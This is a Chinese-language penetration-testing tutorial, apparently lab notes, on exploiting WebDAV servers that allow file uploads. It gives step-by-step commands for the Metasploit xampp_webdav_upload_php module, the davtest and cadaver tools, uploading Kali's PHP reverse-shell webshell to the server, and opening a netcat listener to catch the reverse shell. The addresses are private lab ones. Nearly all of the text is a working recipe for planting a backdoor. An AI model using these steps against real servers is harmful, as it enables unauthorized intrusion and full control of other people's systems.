WebDav漏洞
WebDAV是基于Web服务的扩展服务。它允许用户像操作本地文件一样,操作服务器上的文件。借助该功能,用户很方便的在网络上存储自己的文件。为了方便用户使用,通常会提供给用户较大的文件权限,如上传、修改甚至是执行权限。可以上传后门,对服务器进行控制。
MSF
利用过程 :
search webdav
use exploit/windows/http/xampp_webdav_upload_php
set USERNAME xxx
set PASSWORD xxx
set RHOSTS 192.168.56.112
set LHOST 192.168.56.100
exploit
注意:一旦msf上传成功,就会在/webdav/目录下看到上传的文件,手工点击文件才能反弹shell成功!
davtest
DAVTest是Kali Linux提供的一款针对WebDAV服务的漏洞利用工具。该工具会自动检测权限,寻找可执行文件的权限。一旦发现,用户就可以上传内置的后门工具,对服务器进行控制。同时,该工具可以上传用户指定的文件,便于后期利用。
利用过程 :
davtest -url http://192.168.56.112/webdev -auth username:password
davtest 通过上传文件测试。创建了一个名为“DavTestDir__xxxxxxx”的文件夹,并往里面上传了一些很多种扩展的文件,并且上传成功了。接着测试了哪些文件可以正常解析,最后给出了上传成功和执行成功的文件。
上传反弹shell文件
如 php 使用 kali 中自带的反弹shell文件进行上传
/usr/share/webshells/php/php-reverse-shell.php
打开shell文件,根据需求配置 kali 的地址和监听端口,然后将文件上传到 davtest
# 修改IP和监听端口
vim /usr/share/webshells/php/php-reverse-shell.php
davtest -url http://192.168.56.112/webdav/ -auth username:password -uploadfile /usr/share/webshells/php/php-reverse-shell.php -uploadloc rev-shell.php
# -uploadfile:指定上传的文件路径
# -uploadloc:指定文件上传到服务器上的名字
然后kali 开启监听,再访问上传的文件即可反弹 shell
nc -lnvp 1234
cadaver
webdav是基于HTTP 1.1的扩展协议,其支持使用 PUT 方法上传文件,基于这个特性可以实现功能强大的内容或配置管理系统。但丰富的功能特性总是会带来安全方面的更多隐患。Cadaver是一个文件上传漏洞的检测和验证工具,cadaver作为一个命令行形式的WEBDAV客户端程序,可以对相应服务器进行任何操作。
利用过程 :
# 修改IP和监听端口
vim /usr/share/webshells/php/php-reverse-shell.php
cadaver http://192.168.56.112/webdav
# 根据提示输入帐号密码
# 使用 put 将本地文件上传上去
put /usr/share/webshells/php/php-reverse-shell.php
然后kali 开启监听,再访问上传的文件即可反弹 shell
nc -lnvp 1234